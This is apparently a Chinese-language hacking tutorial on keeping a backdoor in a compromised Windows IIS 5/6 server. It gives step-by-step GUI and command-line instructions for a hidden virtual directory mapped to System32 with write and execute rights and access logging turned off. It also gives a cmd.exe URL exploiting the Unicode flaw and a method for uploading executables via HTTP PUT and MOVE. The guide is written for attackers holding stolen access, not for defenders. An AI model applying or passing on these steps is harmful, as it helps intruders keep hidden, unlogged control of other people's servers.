標籤:
windows下的iis5/iis6做後門,隱藏訪問,不留訪問記錄或者不留日誌
好不容易攻下一台Windows2000/2003 IIS伺服器,你一定會想,怎樣才能長期佔有這個“肉雞”呢?聰明的你肯定會想到留後門這個法子。
對Windows系列下的Web伺服器來說,筆者覺得最好的後門莫過於通過80連接埠安置後門,因為既然要對外提供Web服務,管理員總不會把80連接埠給屏蔽了吧。下面讓我們來看看怎麼設定IIS後門。
一 GUI方式設定
如果你能通過GUI(圖形介面)方式管理肉雞的話(通過 3389連接埠的Windows 終端服務、4899連接埠的Radmin服務、Pcanywhere、VNC、DameWare等GUI方式的遠端管理軟體),那就最簡單不過了。可以通過如下方式建立一個隱形後門:
1.先在Web根目錄下建立一個子目錄shell,然後開啟“Internet資訊服務”管理器,在shell目錄下建立一個指向C:\WinNT \system32的虛擬目錄door,然後刪除Web根目錄下的shell目錄,這樣在IIS管理器中就看不到shell目錄了,也看不到door這個 虛擬目錄了(這是IIS顯示目錄的一個Bug,實際上這個虛擬目錄仍然存在)。
通過瀏覽器訪問不到shell這個路徑,但是依然可以訪問到shell/door這個路徑。不過這並沒有完,我們需要在IIS管理器中對虛擬目錄door的許可權做進一步設定。
2.在door屬性中,我們設定本地路徑為“C:\WinNT\System32”(見圖),在“指令碼資源訪問”、“讀取”、“寫入”、“瀏覽目錄”複選 框前打鉤,把“日誌訪問”和“索引此資源”複選框前的鉤去掉,在“執行許可”中選擇“指令碼和可執行程式”,“應用程式保護”選擇“低 (IIS進程)”。
好了,現在我們就有了一個功能強大而且不會留下任何痕迹的Web Shell了(還記得Unicode漏洞嗎?在地址欄中輸入http:// 219.***.18.63 /shell/door/cmd.exe?/c+dir c:\ 看看)。
二 命令列方式設定
有人可能會問了,如果只有命令列下的shell,能不能設定IIS後門呢?答案是肯定的。這裡需要用一些系統內建的工具。IIS伺服器安裝時會自動在 C:\Inetpub\AdminScript下安裝一些用來配置IIS的指令碼,如adsutil.vbs、chaccess.vbs、 mkwebdir.vbs、disptree.vbs等,我們可以通過這些指令碼來修改Web目錄的許可權。
在命令列shell下,輸入“cscript.exe adsutil.vbs enum w3svc/1/root”,看看Web伺服器的配置。從中選一個虛擬目錄test,給它賦予可寫入權限:“chaccess -a w3svc/1/ROOT/test +write”,按照如下的命令再給它賦予指令碼和可執行程式的執行許可權:“chaccess -a w3svc/1/ROOT/test +script +execute”。
三 利用可寫可執行許可權目錄
上面介紹了兩種方法獲得IIS伺服器上的一個可寫的目錄,但怎樣怎麼利用呢?
利用IIS後門的方法有很多種,這裡只討論如何利用一個有可寫可執行許可權的目錄的問題。一般的思路是遠程提交資料,高手都喜歡用瑞士軍刀—— Netcat,不過這個是命令列下的工具,新手用起來可能不習慣。下面介紹一個桂林老兵發布的作品(:http://www.gxgl.com /?actio
n=soft&module=show&id=12)。
資料包格式有OPTIONS、GET、HEAD、DELETE、PUT、POST等多種。我們可以用PUT方法從本地選一個檔案上傳到伺服器上,然後用 MOVE方法給它改名為.exe可執行程式或.asp可執行指令碼。更詳細的使用方法可以參看程式附帶的Readme文檔,這裡就不再贅述了。
windows的iis做後門,隱藏訪問,無日誌